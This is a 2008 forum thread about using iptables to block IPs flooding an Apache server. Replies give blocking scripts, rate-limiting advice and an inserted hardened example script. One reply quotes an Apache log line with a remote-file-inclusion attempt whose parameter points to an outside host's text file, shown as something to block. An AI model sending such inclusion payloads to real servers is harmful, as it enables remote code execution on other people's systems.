Iptables to Manage web-Attacks [Linux Expert]

 
 
Pseudonyme

 
      02-16-2008, 05:58 PM

Paris, 16 Feb 2008,

Dear all,

Do you know how to manage iptables?

The point is we have a WS that is receiving tons of abnormal IPs that are
connecting at a rapid pace.

We attempt to believe that our Hosting House (Affinity) are true
professionals: much better than we are.

We do not know why, for 7 days, someone destroys everything launching
tons of connections: the problem is Apache is getting overloaded with
requests until the server runs out of memory and crashes.
For sure our USD 1.10 EBITDA / Day loss-of-time company worth these
attacks.

Hosting experts enabled syn-cookies, modified Apache timeouts and
Server-Pool Size Regulation, and blocked IPs in iptables.

I went through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
line: "locate iptables" and edited files.

Could not figure out where the IPs are listed and added to the
definition list.

Nothing in:
/var/lock/subsys/iptables
/etc/sysconfig/iptables-config
/lib/iptables
/etc/sysconfig/iptables
/sbin/iptables

Do you know the name of the file & location that includes the list of
blocked IPs?

Many thanks and regards in advance for your advice.
cougloff

david

 
      02-16-2008, 06:14 PM
On Sat, 16 Feb 2008 10:58:48 -0800, Pseudonyme rearranged some electrons
to say:

> Paris, 16 Feb 2008,
>
> Dear all,
>
> Do you know how to manage iptables?
>
> The point is we have a WS that is receiving tons of abnormal IPs that are
> connecting at a rapid pace.
>
> We attempt to believe that our Hosting House (Affinity) are true
> professionals: much better than we are.
>
> We do not know why, for 7 days, someone destroys everything launching
> tons of connections: the problem is Apache is getting overloaded with
> requests until the server runs out of memory and crashes. For sure our
> USD 1.10 EBITDA / Day loss-of-time company worth these attacks.
>
> Hosting experts enabled syn-cookies, modified Apache timeouts and
> Server-Pool Size Regulation, and blocked IPs in iptables.
>
> I went through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
> line: "locate iptables" and edited files.
>
> Could not figure out where the IPs are listed and added to the
> definition list.
>
> Nothing in:
> /var/lock/subsys/iptables
> /etc/sysconfig/iptables-config
> /lib/iptables
> /etc/sysconfig/iptables
> /sbin/iptables
>
> Do you know the name of the file & location that includes the list of
> blocked IPs?
>
> Many thanks and regards in advance for your advice. cougloff


You could use tcp wrappers:
man tcpd
Jan Panteltje

 
      02-16-2008, 06:50 PM
On a sunny day (Sat, 16 Feb 2008 10:58:48 -0800 (PST)) it happened Pseudonyme
<(E-Mail Removed)> wrote in
<b0e0b9c3-4a98-40b8-b205-(E-Mail Removed)>:

>I went through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
>line: "locate iptables" and edited files.
>
>Could not figure out where the IPs are listed and added to the
>definition list.
>
>Nothing in:
>/var/lock/subsys/iptables
>/etc/sysconfig/iptables-config
>/lib/iptables
>/etc/sysconfig/iptables
>/sbin/iptables
>
>Do you know the name of the file & location that includes the list of
>blocked IPs?
>
>Many thanks and regards in advance for your advice.
>cougloff


I use iptables for this, but of course in my own way ;-)

I have a script, I run as root:
----------------------------------------------------
#!/bin/sh
# This is called to add an input deny for an IP address to iptables,
# and save the configuration.

if [ "$1" = "" ]
then
    echo "Usage: reject IP_address"
    exit 1
fi
# Drop everything coming from the address, and refuse anything going to it
# (on OUTPUT the address is the destination, so match with -d).
iptables -A INPUT -s "$1" -p all -j DROP
iptables -A OUTPUT -d "$1" -p all -j REJECT

iptables-save > /root/firewall

exit 0
--------------------------------------------------


For example, if I see in the apache log something like this:
83.137.193.66 www.stockguard.nl - - [15/Feb/2008:20:27:49 +0100] "GET /panteltje/fpga//cp2.php?securelib=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 887
then, despite that the bad guy got a 404, I do:
reject 83.137.193.66
And he will never find my server again, or get any response from it, as the nameserver is also here.

You will see from the above script that you can make your own list with:

iptables-save > /path_to/yourtables


There is also an iptables-restore, to initialize at power up:
/sbin/iptables-restore < /path_to/yourtables

You can flush with
iptables -F

or list all entries (takes a long time as it does nslookup) with
iptables -L



Jerry McBride

 
      02-16-2008, 06:56 PM
Pseudonyme wrote:

>
> Paris, 16 Feb 2008,
>
> Dear all,
>
> Do you know how to manage iptables?
>
> The point is we have a WS that is receiving tons of abnormal IPs that are
> connecting at a rapid pace.
>
> We attempt to believe that our Hosting House (Affinity) are true
> professionals: much better than we are.
>
> We do not know why, for 7 days, someone destroys everything launching
> tons of connections: the problem is Apache is getting overloaded with
> requests until the server runs out of memory and crashes.
> For sure our USD 1.10 EBITDA / Day loss-of-time company worth these
> attacks.
>
> Hosting experts enabled syn-cookies, modified Apache timeouts and
> Server-Pool Size Regulation, and blocked IPs in iptables.
>
> I went through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
> line: "locate iptables" and edited files.
>
> Could not figure out where the IPs are listed and added to the
> definition list.
>
> Nothing in:
> /var/lock/subsys/iptables
> /etc/sysconfig/iptables-config
> /lib/iptables
> /etc/sysconfig/iptables
> /sbin/iptables
>
> Do you know the name of the file & location that includes the list of
> blocked IPs?
>
> Many thanks and regards in advance for your advice.
> cougloff


When you find it, why not post it? Make for good reading...


--

Jerry McBride ((E-Mail Removed))
J.O. Aho

 
      02-16-2008, 08:23 PM
Pseudonyme wrote:

> Do you know how to manage iptables?


This depends on which "firewall" you are using to generate the iptables rules.


> I went through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
> line: "locate iptables" and edited files.
>
> Could not figure out where the IPs are listed and added to the
> definition list.
>
> Do you know the name of the file & location that includes the list of
> blocked IPs?


Use iptables to add a new rule (see the manual page for iptables or visit
www.iptables.org) and then use the iptables save feature to store the data for
next restart.


--

//Aho
giovanni_mangia@libero.it

 
      02-17-2008, 12:08 AM
On 16 Feb, 19:58, Pseudonyme <norman_cougl...@2cuk.co.uk> wrote:
> Paris, 16 Feb 2008,
>
> Dear all,
>
> Do you know how to manage iptables?
>
> The point is we have a WS that is receiving tons of abnormal IPs that are
> connecting at a rapid pace.
>
> We attempt to believe that our Hosting House (Affinity) are true
> professionals: much better than we are.
>
> We do not know why, for 7 days, someone destroys everything launching
> tons of connections: the problem is Apache is getting overloaded with
> requests until the server runs out of memory and crashes.
> For sure our USD 1.10 EBITDA / Day loss-of-time company worth these
> attacks.
>
> Hosting experts enabled syn-cookies, modified Apache timeouts and
> Server-Pool Size Regulation, and blocked IPs in iptables.
>
> I went through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
> line: "locate iptables" and edited files.
>
> Could not figure out where the IPs are listed and added to the
> definition list.
>
> Nothing in:
> /var/lock/subsys/iptables
> /etc/sysconfig/iptables-config
> /lib/iptables
> /etc/sysconfig/iptables
> /sbin/iptables
>
> Do you know the name of the file & location that includes the list of
> blocked IPs?
>
> Many thanks and regards in advance for your advice.
> cougloff


If you want, you can use the graphic tool system-config-firewall; it
does a good job...
Andrew Gideon

 
      02-17-2008, 10:33 PM
On Sat, 16 Feb 2008 10:58:48 -0800, Pseudonyme wrote:

> We do not know why, for 7 days, someone destroys everything launching
> tons of connections: the problem is Apache is getting overloaded with
> requests until the server runs out of memory and crashes. For sure our
> USD 1.10 EBITDA / Day loss-of-time company worth these attacks.


Perhaps blocking more than N connections per time unit from any IP
address? This could block quick legitimate accesses, but it might also
block what appear to be DOS attacks.

iptables can do this. See the "hashlimit" module.

This will only work if there are many connections from a given IP. If
the attack is sufficiently distributed, this will block too much
legitimate traffic before helping with the attacks. But if you're trying
to block individual IPs, then perhaps the attack is not terribly
distributed.

- Andrew
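A hardened form of the "reject" script from Jan Panteltje's post, combined with the per-source hashlimit rule Andrew suggests, written as an added example rather than anyone's own code from this thread. The save path, the 20/min and burst-of-40 thresholds, and the IPTABLES_DRYRUN switch are assumptions.

```shell
#!/bin/sh
# Added example, not the poster's script or any project's code.
# IPTABLES_DRYRUN=1 prints each iptables command instead of running it,
# so the logic can be checked without root or a live firewall.
# The save path and the rate thresholds are assumptions.
SAVE_FILE="${SAVE_FILE:-/root/firewall}"

run() {
    if [ "${IPTABLES_DRYRUN:-0}" = "1" ]; then echo "$*"; else "$@"; fi
}

# Accept only a dotted-quad IPv4 address (each octet 0-255), so that
# hostnames, garbage or shell metacharacters never reach iptables.
is_ipv4() {
    printf '%s\n' "$1" | awk -F. 'NF != 4 { exit 1 }
        { for (i = 1; i <= 4; i++) if ($i !~ /^[0-9]+$/ || $i > 255) exit 1 }'
}

save_rules() {
    if [ "${IPTABLES_DRYRUN:-0}" = "1" ]; then
        echo "iptables-save > $SAVE_FILE"
    else
        iptables-save > "$SAVE_FILE"
    fi
}

# Drop everything from the address, refuse replies to it (OUTPUT matches
# on destination, not source), then persist for iptables-restore at boot.
reject_ip() {
    if ! is_ipv4 "$1"; then
        echo "Usage: reject_ip IPv4_address" >&2
        return 1
    fi
    run iptables -A INPUT -s "$1" -j DROP
    run iptables -A OUTPUT -d "$1" -j REJECT
    save_rules
}

# Per-source limit on new HTTP connections: once a source exceeds 20
# SYNs per minute (after a burst of 40) further SYNs are dropped, which
# throttles a single noisy IP without a hand-maintained blocklist.
http_rate_limit() {
    run iptables -A INPUT -p tcp --dport 80 --syn \
        -m hashlimit --hashlimit-above 20/min --hashlimit-burst 40 \
        --hashlimit-mode srcip --hashlimit-name http_syn -j DROP
}
```

As Andrew notes, the rate limit only helps when many connections come from the same source; a widely distributed flood needs upstream filtering instead.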
dennis@home

 
      02-18-2008, 07:57 AM
On Sat, 16 Feb 2008 10:58:48 -0800, Pseudonyme wrote:
>
> We do not know why, for 7 days, someone destroys everything launching
> tons of connections: the problem is Apache is getting overloaded with
> requests until the server runs out of memory and crashes. For sure our
> USD 1.10 EBITDA / Day loss-of-time company worth these attacks.



Have you thought of putting in a reverse cache server and putting in a
redirect for the page(s) they are requesting?
Then the cache will respond much faster while the existing server can take
care of the redirected traffic, which the "attacker" probably won't follow as
it's unlikely they are actually looking at the response or even waiting for
it.
You may even be able to do this on a hosted server so that the attacks never
arrive at your physical site.
You may have to change the redirects if the attacker decides to follow you
about to your original server, but it's better than nothing and the host
provider probably has experience of stopping these attacks using filters and
they have the bandwidth to do it, which you probably don't.

